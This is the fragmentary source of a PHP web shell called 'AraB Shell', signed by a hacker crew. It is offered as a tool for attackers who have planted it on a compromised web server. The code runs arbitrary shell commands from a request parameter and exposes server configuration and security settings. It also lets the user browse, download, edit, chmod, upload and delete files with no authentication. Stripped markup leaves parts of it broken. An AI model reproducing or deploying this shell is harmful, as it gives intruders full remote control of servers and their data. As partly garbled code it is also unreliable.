"" ){ // path & file name $path_parts = pathinfo("$fdownload"); $entrypath=$path_parts["basename"]; $name = "$fdownload"; $fp = fopen($name, 'rb'); header("Content-Disposition: attachment; filename=$entrypath"); header("Content-Length: " . filesize($name)); fpassthru($fp); exit; } ?> #OuNeT***Shell#
«§∞ AraB Shell ∞§»
coded By JIKO From Maroc

";

			}
error_reporting(E_ERROR | E_WARNING | E_PARSE);
 //server information
 if($id=="sys"){
 echo '


.:File Manager:.
.:CMD:. .:INFO:. .:Server:. .:About:.

***************************************************************************
 Arab Hackers : WWW.Tryag.COM & WWW.no-back.org
 codec : jiko From Maroc
 Team : Jiki TEAM [maroc - yamen Hacker]
 Note : Troops Of mohamed comming Inchalah
 e-mail : jalikom(at)hotmail(dot)com
  greetz : Kil1er and Tryag Team and H-T Team and V4 Team and all friends
  Info : For more information Visit Www.no-back.org Or Tryag.com
***************************************************************************
 

JIkO WAS Here

"; echo "OS :". php_uname(); echo "
IP :". ($_SERVER['REMOTE_ADDR']); echo "
"; echo "
OS: '; echo php_uname(); echo ' 

Server: '; echo (htmlentities($_SERVER['SERVER_SOFTWARE'])); echo '  '; $tymczas="./"; // Set $tymczas to dir where you have 777 like /var/tmp if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = true; $hsafemode = "ON (secure)"; } else {$safemode = false; $hsafemode = "OFF (not secure)";} echo("Safe-mode: $hsafemode"); $v = @ini_get("open_basedir"); if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";} else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";} echo(". / ."); echo("Open base dir: $hopenbasedir"); echo("  "); echo "
Disable functions : "; if(''==($df=@ini_get('disable_functions'))){echo "NONE";}else{echo "$df";} $free = @diskfreespace($dir); if (!$free) {$free = 0;} $all = @disk_total_space($dir); if (!$all) {$all = 0;} $used = $all-$free; $used_percent = @round(100/($all/$free),2); echo"

"; } //File Edit $fedit=$_GET['fedit']; if ($fedit <> "" ){ $fedit=realpath($fedit); $lines = file($fedit); echo "
"; echo "
"; $savefile=$_POST['savefile']; $filepath=realpath($_POST['filepath']); if ($savefile <> "") { $fp=fopen("$filepath","w+"); fwrite ($fp,"") ; fwrite ($fp,$savefile) ; fclose($fp); echo ""; } exit(); } // CHmod - Pirmission $fchmod=$_GET['fchmod']; if ($fchmod <> "" ){ $fchmod=realpath($fchmod); echo "

chmod for :$fchmod

Chmod :

"; $chmod0=$_POST['chmod0']; if ($chmod0 <> ""){ chmod ($fchmod , $chmod0); }else { echo "primission Not Allow change Chmod"; } exit(); } //command $cmd=$_POST['cmd']; if($id=="cmd"){ $result=shell_exec("$cmd"); echo "

CMD ExeCute

" ; echo "






"; } //******************************************************** //info server if ( $id=="info"){ phpinfo(); } //******************************************************** //file manger see result $homedir=getcwd(); $dir=realpath($_GET['dir'])."/"; if ($id=="fm"){ echo "

 Home: $homedir    Path:


"; echo "
"; if (is_dir($dir)){ if ($dh=opendir($dir)){ while (($file = readdir($dh)) !== false) { $fsize=round(filesize($dir . $file)/1024); echo " "; } closedir($dh); } } echo "
File / Folder Name Size KByte Download Edit Chmod Delete
"; if (is_dir($dir.$file)) { echo " $file dir"; } else { echo " $file "; } echo " "; if (is_file($dir.$file)) { echo "$fsize"; } else { echo "  "; } echo " "; if (is_file($dir.$file)){ if (is_readable($dir.$file)){ echo "download"; }else { echo "No ReadAble"; } }else { echo " "; } echo " "; if (is_file($dir.$file)) { if (is_readable($dir.$file)){ echo "Edit"; }else { echo "No ReadAble"; } }else { echo " "; } echo " "; if (strtoupper(substr(PHP_OS, 0, 3)) === '') { echo "Dont in windows"; } else { echo "Chmod"; } echo " Delete
Send this file:
"; } //Upload Files $rpath=$_GET['dir']; if ($rpath <> "") { $uploadfile = $rpath."/" . $_FILES['userfile']['name']; print "
";
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "";
echo "";
}
 }
  //file deleted
$frpath=$_GET['fdelete'];
if ($frpath <> "") {
if (is_dir($frpath)){
$matches = glob($frpath . '/*.*');
if ( is_array ( $matches ) ) {
  foreach ( $matches as $filename) {
  unlink ($filename);
  rmdir("$frpath");
echo "";
echo "";
  }
  }
  }
  else{
echo "";
unlink ("$frpath");
echo "";
exit(0);

  }
  

}

?>